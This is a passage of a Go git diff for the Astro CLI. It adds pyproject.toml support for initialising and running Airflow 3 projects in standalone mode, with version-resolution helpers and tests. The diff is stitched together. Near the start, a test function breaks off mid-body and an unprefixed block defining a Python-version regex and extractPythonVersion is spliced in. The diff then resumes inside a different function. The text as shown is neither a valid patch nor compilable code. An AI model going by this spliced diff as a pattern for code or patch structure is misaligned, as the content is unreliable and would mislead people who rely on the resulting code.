TestDetectProjectFormat_PyProject() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(validPyProject), 0o644)) + + s.Equal(ProjectFormatPy, DetectProjectFormat(tmpDir)) +} + +func (s *Suite) TestDetectProjectFormat_Dockerfile() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte("FROM astro-runtime:12.0.0"), 0o644)) + + s.Equal(ProjectFormatDocker, DetectProjectFormat(tmpDir)) +} + +func (s *Suite) TestDetectProjectFormat_BothPrefersPyProject() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(validPyProject), 0o644)) + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte("FROM astro-runtime:12.0.0"), 0o644)) + + s.Equal(ProjectFormatPy, DetectProjectFormat(tmpDir)) +} + +func (s *Suite) TestDetectProjectFormat_Unknown() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Equal(ProjectFormatUnknown, DetectProjectFormat(tmpDir)) +} + +func (s *Suite) TestDetectProjectFormat_PyProjectWithoutAstro() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + // pyproject.toml exists but without [tool.astro] — should NOT be detected as pyproject format + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(noAstroSection), 0o644)) + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte("FROM astro-runtime:12.0.0"), 0o644)) + + s.Equal(ProjectFormatDocker, DetectProjectFormat(tmpDir)) +} + +// --- PinRuntimeVersion tests --- + +func (s *Suite) TestPinRuntimeVersion_AddsWhenMissing() { + 
// pythonVersionRe matches one clause of a comma-separated PEP 440 specifier
// set whose version is usable as an interpreter version: a bare version, or
// one introduced by ==, ===, ~=, >= or >. Clauses introduced by <, <= or != do
// not match, because the version they name is an upper bound or an exclusion.
// Capture group 1 holds the major.minor part of the version.
var pythonVersionRe = regexp.MustCompile(`(?:^|,)\s*(?:===?|~=|>=?)?\s*(\d+\.\d+)`)

// extractPythonVersion extracts a bare major.minor version such as "3.12" from
// a PEP 440 requires-python specifier such as ">=3.12", "==3.12" or
// "<3.13,>=3.11".
//
// Only clauses that pin or lower-bound the version are considered, so an upper
// bound or exclusion is never returned: "<3.13,>=3.11" yields "3.11" and
// "!=3.10.*,>=3.9" yields "3.9". When several clauses qualify, the leftmost
// one wins.
//
// It returns "" when the input is empty or contains no usable clause (for
// example "<4" or ">=3").
func extractPythonVersion(requiresPython string) string {
	m := pythonVersionRe.FindStringSubmatch(requiresPython)
	if m == nil {
		return ""
	}
	return m[1]
}
+ var baseTag, pythonVersion string + var userDeps []string // populated only for pyproject format + var isPyProjectFmt bool // tracks format to avoid re-parsing pyproject.toml later + + proj, found, tryErr := TryReadProject(s.airflowHome) + if found && tryErr != nil { + return fmt.Errorf("error reading pyproject.toml: %w", tryErr) + } + if proj != nil { + isPyProjectFmt = true + baseTag = proj.RuntimeVersion + if baseTag == "" { + // Resolve from airflow-version and pin it to pyproject.toml + if proj.AirflowVersion == "" { + return errors.New("[tool.astro] requires airflow-version in pyproject.toml") + } + baseTag = airflowversions.GetLatestRuntimeForAirflow(proj.AirflowVersion) + if baseTag == "" { + return fmt.Errorf("could not resolve a runtime version for airflow-version %q", proj.AirflowVersion) + } + fmt.Printf("Resolved runtime-version %q for airflow-version %q (pinning to pyproject.toml)\n", baseTag, proj.AirflowVersion) + fmt.Println("Note: one airflow-version may have multiple runtime versions. Pin runtime-version in pyproject.toml to avoid accidental upgrades on deploy.") + if pinErr := PinRuntimeVersion(s.airflowHome, baseTag); pinErr != nil { + fmt.Printf("Warning: could not pin runtime-version to pyproject.toml: %s\n", pinErr) + } + } + // Validate airflow-version matches runtime-version + if proj.AirflowVersion != "" { + actual := airflowversions.GetAirflowVersionForRuntime(baseTag) + if actual != "" && actual != proj.AirflowVersion { + fmt.Printf("Warning: airflow-version %q does not match runtime-version %q (which bundles Airflow %s). 
Consider updating airflow-version or runtime-version.\n", + proj.AirflowVersion, baseTag, actual) + } + } - baseTag, tagPython := parseRuntimeTagPython(tag) + pythonVersion = extractPythonVersion(proj.RequiresPython) + if pythonVersion == "" { + pythonVersion = resolvePythonVersion(baseTag, "") + } + userDeps = proj.Dependencies + } else { + // Legacy path: parse Dockerfile + cmds, parseErr := standaloneParseFile(filepath.Join(s.airflowHome, "Dockerfile")) + if parseErr != nil { + return fmt.Errorf("error parsing Dockerfile: %w", parseErr) + } + _, tag := standaloneGetImageTag(cmds) + if tag == "" { + return errors.New("could not determine runtime version from Dockerfile") + } - // 2. Validate Airflow version (AF3 only). - // If the tag isn't a pinned runtime version (X.Y-Z), try to resolve it - // as a floating tag (e.g., "3.1" → "3.1-12") via the runtime versions JSON. - if !fullRuntimeTagRe.MatchString(baseTag) { - resolved, resolveErr := resolveFloatingTag(baseTag) - if resolveErr == nil { - baseTag = resolved - } else if airflowversions.AirflowMajorVersionForRuntimeVersion(baseTag) == "" { - // Not a recognized format and not resolvable - return fmt.Errorf("could not determine runtime version from Dockerfile image tag '%s'.\nStandalone mode requires a pinned Astronomer Runtime image (e.g., astro-runtime:3.1-12)", tag) + var tagPython string + baseTag, tagPython = parseRuntimeTagPython(tag) + + // If the tag isn't a pinned runtime version (X.Y-Z), try to resolve it + // as a floating tag (e.g., "3.1" → "3.1-12") via the runtime versions JSON. 
+ if !fullRuntimeTagRe.MatchString(baseTag) { + resolved, resolveErr := resolveFloatingTag(baseTag) + if resolveErr == nil { + baseTag = resolved + } else if airflowversions.AirflowMajorVersionForRuntimeVersion(baseTag) == "" { + return fmt.Errorf("could not determine runtime version from Dockerfile image tag '%s'.\nStandalone mode requires a pinned Astronomer Runtime image (e.g., astro-runtime:3.1-12)", tag) + } } - // If it's an old-format tag (e.g., "12.0.0"), fall through to the AF3 check + + pythonVersion = resolvePythonVersion(baseTag, tagPython) } + + // 2. Validate Airflow version (AF3 only). if airflowversions.AirflowMajorVersionForRuntimeVersion(baseTag) != "3" { return errUnsupportedAirflowVersion } - pythonVersion := resolvePythonVersion(baseTag, tagPython) - // 3. Check uv is on PATH - _, err = lookPath("uv") + _, err := lookPath("uv") if err != nil { return errUVNotFound } @@ -292,23 +348,46 @@ func (s *Standalone) Start(opts *types.StartOptions) error { return fmt.Errorf("error installing dependencies: %w", err) } - // Step 2: Install user requirements with only airflow/sdk version locks - requirementsPath := filepath.Join(s.airflowHome, "requirements.txt") - if exists, _ := fileutil.Exists(requirementsPath, nil); exists { - userInstallArgs := []string{ - "pip", "install", - "--python", venvPython, - "-r", requirementsPath, - fmt.Sprintf("apache-airflow==%s", airflowVersion), - } - if taskSDKVersion != "" { - userInstallArgs = append(userInstallArgs, fmt.Sprintf("apache-airflow-task-sdk==%s", taskSDKVersion)) + // Step 2: Install user dependencies with only airflow/sdk version locks. + // If project uses pyproject.toml, install from [project.dependencies]. + // Otherwise, install from requirements.txt (legacy path). 
+ if isPyProjectFmt { + if len(userDeps) > 0 { + userInstallArgs := []string{ + "pip", "install", + "--python", venvPython, + fmt.Sprintf("apache-airflow==%s", airflowVersion), + } + if taskSDKVersion != "" { + userInstallArgs = append(userInstallArgs, fmt.Sprintf("apache-airflow-task-sdk==%s", taskSDKVersion)) + } + // Use -- to prevent dependency strings from being interpreted as flags + userInstallArgs = append(userInstallArgs, "--index-url", standaloneIndexURL, "--") + userInstallArgs = append(userInstallArgs, userDeps...) + err = runCommand(s.airflowHome, "uv", userInstallArgs...) + if err != nil { + sp.Stop() + return fmt.Errorf("error installing user dependencies: %w", err) + } } - userInstallArgs = append(userInstallArgs, "--index-url", standaloneIndexURL) - err = runCommand(s.airflowHome, "uv", userInstallArgs...) - if err != nil { - sp.Stop() - return fmt.Errorf("error installing user requirements: %w", err) + } else { + requirementsPath := filepath.Join(s.airflowHome, "requirements.txt") + if exists, _ := fileutil.Exists(requirementsPath, nil); exists { + userInstallArgs := []string{ + "pip", "install", + "--python", venvPython, + "-r", requirementsPath, + fmt.Sprintf("apache-airflow==%s", airflowVersion), + } + if taskSDKVersion != "" { + userInstallArgs = append(userInstallArgs, fmt.Sprintf("apache-airflow-task-sdk==%s", taskSDKVersion)) + } + userInstallArgs = append(userInstallArgs, "--index-url", standaloneIndexURL) + err = runCommand(s.airflowHome, "uv", userInstallArgs...) 
+ if err != nil { + sp.Stop() + return fmt.Errorf("error installing user requirements: %w", err) + } } } diff --git a/airflow/standalone_test.go b/airflow/standalone_test.go index afe5fec52..4d03735a0 100644 --- a/airflow/standalone_test.go +++ b/airflow/standalone_test.go @@ -846,6 +846,125 @@ func (s *Suite) TestStandaloneStart_HappyPath() { s.NoError(err) } +func (s *Suite) TestStandaloneStart_PyProject() { + tmpDir, err := os.MkdirTemp("", "standalone-pyproject-test") + s.NoError(err) + defer os.RemoveAll(tmpDir) + + // Write pyproject.toml instead of Dockerfile + pyprojectContent := `[project] +name = "test-pyproject" +requires-python = ">=3.12" +dependencies = ["pandas>=2.0"] + +[tool.astro] +airflow-version = "3.0.1" +runtime-version = "3.1-12" +mode = "standalone" +` + err = os.WriteFile(filepath.Join(tmpDir, "pyproject.toml"), []byte(pyprojectContent), 0o644) + s.NoError(err) + + // Pre-create cached constraints + freeze + constraintsDir := filepath.Join(tmpDir, ".astro", "standalone") + err = os.MkdirAll(constraintsDir, 0o755) + s.NoError(err) + err = os.WriteFile(filepath.Join(constraintsDir, "constraints-3.1-12-python-3.12.txt"), []byte("apache-airflow==3.0.1\napache-airflow-task-sdk==1.0.0\n"), 0o644) + s.NoError(err) + err = os.WriteFile(filepath.Join(constraintsDir, "freeze-3.1-12-python-3.12.txt"), []byte("apache-airflow==3.0.1\n"), 0o644) + s.NoError(err) + + // Create a fake airflow binary that exits immediately + venvBin := filepath.Join(tmpDir, ".venv", "bin") + err = os.MkdirAll(venvBin, 0o755) + s.NoError(err) + airflowScript := filepath.Join(venvBin, "airflow") + err = os.WriteFile(airflowScript, []byte("#!/bin/sh\necho 'standalone started'\nexit 0\n"), 0o755) + s.NoError(err) + + // Mock function variables + origLookPath := lookPath + origRunCommand := runCommand + origCheckHealth := checkWebserverHealth + origCheckPort := checkPortAvailable + defer func() { + lookPath = origLookPath + runCommand = origRunCommand + checkWebserverHealth = 
origCheckHealth + checkPortAvailable = origCheckPort + }() + + checkPortAvailable = func(_ string) error { return nil } + + lookPath = func(file string) (string, error) { + return "/usr/local/bin/uv", nil + } + + // Track what uv commands were executed to verify pyproject.toml path + var uvCalls []string + runCommand = func(dir, name string, args ...string) error { + uvCalls = append(uvCalls, strings.Join(append([]string{name}, args...), " ")) + return nil + } + + checkWebserverHealth = func(url string, timeout time.Duration, component string) error { + return nil + } + + handler, err := StandaloneInit(tmpDir, ".env", "Dockerfile") + s.NoError(err) + + err = handler.Start(&types.StartOptions{SettingsFile: "airflow_settings.yaml", WaitTime: 1 * time.Minute, Foreground: true}) + s.NoError(err) + + // Verify that user deps from pyproject.toml were installed (not requirements.txt) + foundUserDeps := false + for _, call := range uvCalls { + if strings.Contains(call, "pandas>=2.0") { + foundUserDeps = true + break + } + } + s.True(foundUserDeps, "Expected uv install to include pandas>=2.0 from pyproject.toml dependencies, got calls: %v", uvCalls) + + // Verify no requirements.txt was referenced + for _, call := range uvCalls { + s.NotContains(call, "requirements.txt", "Should not reference requirements.txt when pyproject.toml is used") + } +} + +func (s *Suite) TestStandaloneStart_PyProject_MissingAirflowVersion() { + tmpDir, err := os.MkdirTemp("", "standalone-pyproject-noairflow") + s.NoError(err) + defer os.RemoveAll(tmpDir) + + // pyproject.toml without airflow-version — should error about the broken pyproject.toml + pyprojectContent := `[project] +name = "test-no-airflow" + +[tool.astro] +runtime-version = "3.1-12" +` + err = os.WriteFile(filepath.Join(tmpDir, "pyproject.toml"), []byte(pyprojectContent), 0o644) + s.NoError(err) + + handler, err := StandaloneInit(tmpDir, ".env", "Dockerfile") + s.NoError(err) + + err = handler.Start(&types.StartOptions{SettingsFile: 
"airflow_settings.yaml", WaitTime: 1 * time.Minute}) + s.Error(err) + s.Contains(err.Error(), "airflow-version") +} + +func (s *Suite) TestExtractPythonVersion() { + s.Equal("3.12", extractPythonVersion(">=3.12")) + s.Equal("3.11", extractPythonVersion(">=3.11")) + s.Equal("3.12", extractPythonVersion("==3.12")) + s.Equal("3.12", extractPythonVersion("~=3.12")) + s.Equal("3.12", extractPythonVersion("3.12")) + s.Equal("", extractPythonVersion("")) +} + func (s *Suite) TestStandaloneStart_Background() { tmpDir, err := os.MkdirTemp("", "standalone-bg-test") s.NoError(err) diff --git a/airflow_versions/airflow_versions.go b/airflow_versions/airflow_versions.go index 07384d255..de413ef16 100644 --- a/airflow_versions/airflow_versions.go +++ b/airflow_versions/airflow_versions.go @@ -311,3 +311,42 @@ func GetDefaultPythonVersion(runtimeVersion string) string { return "" } + +// GetLatestRuntimeForAirflow fetches the runtime versions JSON and returns +// the latest stable runtime version for the given Airflow version. +// Returns an empty string if no matching version is found. +func GetLatestRuntimeForAirflow(airflowVersion string) string { + r := Request{} + resp, err := r.Do() + if err != nil { + logger.Debugf("Failed to fetch runtime versions: %v", err) + return "" + } + + tag, err := getAstroRuntimeTag(resp.RuntimeVersions, resp.RuntimeVersionsV3, airflowVersion) + if err != nil { + return "" + } + return tag +} + +// GetAirflowVersionForRuntime fetches the runtime versions JSON and returns +// the Airflow version for the given runtime version. Returns an empty string +// if the version is not found. 
+func GetAirflowVersionForRuntime(runtimeVersion string) string { + r := Request{} + resp, err := r.Do() + if err != nil { + logger.Debugf("Failed to fetch runtime versions for Airflow version lookup: %v", err) + return "" + } + + if rv, ok := resp.RuntimeVersionsV3[runtimeVersion]; ok { + return rv.Metadata.AirflowVersion + } + if rv, ok := resp.RuntimeVersions[runtimeVersion]; ok { + return rv.Metadata.AirflowVersion + } + + return "" +} diff --git a/cmd/airflow.go b/cmd/airflow.go index 8e632a589..f1e3f57ca 100644 --- a/cmd/airflow.go +++ b/cmd/airflow.go @@ -109,6 +109,9 @@ astro dev init --airflow-version 2.2.3 # Initialize a new template based Astro project with the latest Astro Runtime version astro dev init --from-template +# Initialize a new Astro project using pyproject.toml (Airflow 3 only) +astro dev init --format pyproject + # Initialize a new Astro project with remote execution support astro dev init --remote-execution-enabled @@ -140,6 +143,10 @@ astro dev init --remote-execution-enabled --remote-image-repository quay.io/acme dockerFlag bool noProxyFlag bool proxyPortFlag string + projectFormat string + + getAirflowVersionForRuntime = airflowversions.GetAirflowVersionForRuntime + getDefaultPythonVersion = airflowversions.GetDefaultPythonVersion ) func newDevRootCmd(platformCoreClient astroplatformcore.CoreClient, astroCoreClient astrocore.CoreClient) *cobra.Command { @@ -180,13 +187,24 @@ func newDevRootCmd(platformCoreClient astroplatformcore.CoreClient, astroCoreCli return cmd } -// resolveDevMode returns "docker" or "standalone" based on flag priority then config. +// resolveDevMode returns "docker" or "standalone" based on priority: +// 1. CLI flags (--standalone, --docker) +// 2. [tool.astro].mode from pyproject.toml +// 3. 
dev.mode from .astro/config.yaml func resolveDevMode() string { if standaloneFlag { - return "standalone" + return airflow.ModeStandalone } if dockerFlag { - return "docker" + return airflow.ModeDocker + } + // Check pyproject.toml mode + proj, found, tryErr := airflow.TryReadProject(config.WorkingPath) + if found && tryErr != nil { + fmt.Printf("Warning: could not read pyproject.toml for mode detection: %s\n", tryErr) + } + if proj != nil && proj.Mode != "" { + return proj.Mode } return config.CFG.DevMode.GetString() } @@ -244,6 +262,9 @@ func newAirflowInitCmd() *cobra.Command { cmd.Flags().BoolVarP(&useAstronomerCertified, "use-astronomer-certified", "", false, "If specified, initializes a project using Astronomer Certified Airflow image instead of Astro Runtime.") _ = cmd.Flags().MarkHidden("use-astronomer-certified") } + + cmd.Flags().StringVar(&projectFormat, "format", "", "Project format: 'pyproject' uses pyproject.toml (Airflow 3 only), 'dockerfile' uses the traditional Dockerfile (default)") + return cmd } @@ -672,8 +693,39 @@ func airflowInit(cmd *cobra.Command, args []string) error { //nolint:gocognit,go // Silence Usage as we have now validated command input cmd.SilenceUsage = true - // Execute method - err = airflow.Init(config.WorkingPath, imageName, imageTag, fromTemplate, clientImageTag) + // Validate --format flag + if projectFormat != "" && projectFormat != airflow.ProjectFormatPy && projectFormat != airflow.ProjectFormatDocker { + return fmt.Errorf("invalid --format value %q: must be 'pyproject' or 'dockerfile'", projectFormat) + } + if projectFormat == airflow.ProjectFormatPy && fromTemplate != "" { + return errors.New("--format pyproject cannot be used with --from-template") + } + + // Route to pyproject.toml init if requested + if projectFormat == airflow.ProjectFormatPy { + if airflowversions.AirflowMajorVersionForRuntimeVersion(imageTag) != "3" { + return errors.New("--format pyproject is only supported for Airflow 3") + } + + // Resolve the 
Airflow version: use the user-provided value, or look it up from the runtime tag. + afVersion := airflowVersion + if afVersion == "" { + afVersion = getAirflowVersionForRuntime(imageTag) + } + if afVersion == "" { + return fmt.Errorf("could not determine Airflow version for runtime %s", imageTag) + } + + // Resolve Python version from the runtime API or fall back to default. + pythonVersion := getDefaultPythonVersion(imageTag) + if pythonVersion == "" { + pythonVersion = airflow.DefaultPythonVersion + } + + err = airflow.InitPyProject(config.WorkingPath, projectName, afVersion, imageTag, pythonVersion) + } else { + err = airflow.Init(config.WorkingPath, imageName, imageTag, fromTemplate, clientImageTag) + } if err != nil { return err } diff --git a/cmd/airflow_test.go b/cmd/airflow_test.go index 71273e15e..a571eb653 100644 --- a/cmd/airflow_test.go +++ b/cmd/airflow_test.go @@ -343,6 +343,92 @@ func (s *AirflowSuite) Test_airflowInitWithRemoteExecution() { }) } +func (s *AirflowSuite) Test_airflowInitFormatPyProject() { + s.Run("creates pyproject.toml project", func() { + config.WorkingPath = s.tempDir + + origGetDefaultImageTag := getDefaultImageTag + getDefaultImageTag = func(httpClient *airflowversions.Client, av string, rv string, excludeAF3 bool) (string, error) { + return "3.0-7", nil + } + defer func() { getDefaultImageTag = origGetDefaultImageTag }() + + origGetAFVersion := getAirflowVersionForRuntime + getAirflowVersionForRuntime = func(runtimeVersion string) string { + return "3.0.1" + } + defer func() { getAirflowVersionForRuntime = origGetAFVersion }() + + origGetPyVersion := getDefaultPythonVersion + getDefaultPythonVersion = func(runtimeVersion string) string { + return "3.12" + } + defer func() { getDefaultPythonVersion = origGetPyVersion }() + + cmd := newAirflowInitCmd() + cmd.Flag("name").Value.Set("test-pyproject") + cmd.Flag("format").Value.Set("pyproject") + var args []string + + err := airflowInit(cmd, args) + s.NoError(err) + + // 
pyproject.toml should exist + b, err := os.ReadFile(filepath.Join(s.tempDir, "pyproject.toml")) + s.NoError(err) + content := string(b) + s.Contains(content, `name = "test-pyproject"`) + s.Contains(content, `airflow-version = "3.0.1"`) + s.Contains(content, `runtime-version = "3.0-7"`) + + // Dockerfile should NOT exist + _, err = os.Stat(filepath.Join(s.tempDir, "Dockerfile")) + s.True(os.IsNotExist(err)) + + // requirements.txt should exist (needed by runtime ONBUILD for Docker mode) + _, err = os.Stat(filepath.Join(s.tempDir, "requirements.txt")) + s.NoError(err) + }) + + s.Run("rejects pyproject format for Airflow 2", func() { + config.WorkingPath = s.tempDir + + origGetDefaultImageTag := getDefaultImageTag + getDefaultImageTag = func(httpClient *airflowversions.Client, av string, rv string, excludeAF3 bool) (string, error) { + return "12.0.0", nil // Airflow 2 runtime tag + } + defer func() { getDefaultImageTag = origGetDefaultImageTag }() + + cmd := newAirflowInitCmd() + cmd.Flag("name").Value.Set("test-af2") + cmd.Flag("format").Value.Set("pyproject") + var args []string + + err := airflowInit(cmd, args) + s.Error(err) + s.Contains(err.Error(), "only supported for Airflow 3") + }) + + s.Run("default format unchanged", func() { + config.WorkingPath = s.tempDir + + cmd := newAirflowInitCmd() + cmd.Flag("name").Value.Set("test-default") + var args []string + + err := airflowInit(cmd, args) + s.NoError(err) + + // Dockerfile should exist (default behavior) + _, err = os.Stat(filepath.Join(s.tempDir, "Dockerfile")) + s.NoError(err) + + // pyproject.toml should NOT exist + _, err = os.Stat(filepath.Join(s.tempDir, "pyproject.toml")) + s.True(os.IsNotExist(err)) + }) +} + func (s *AirflowSuite) cleanUpInitFiles() { s.T().Helper() if s.tempDir != "" {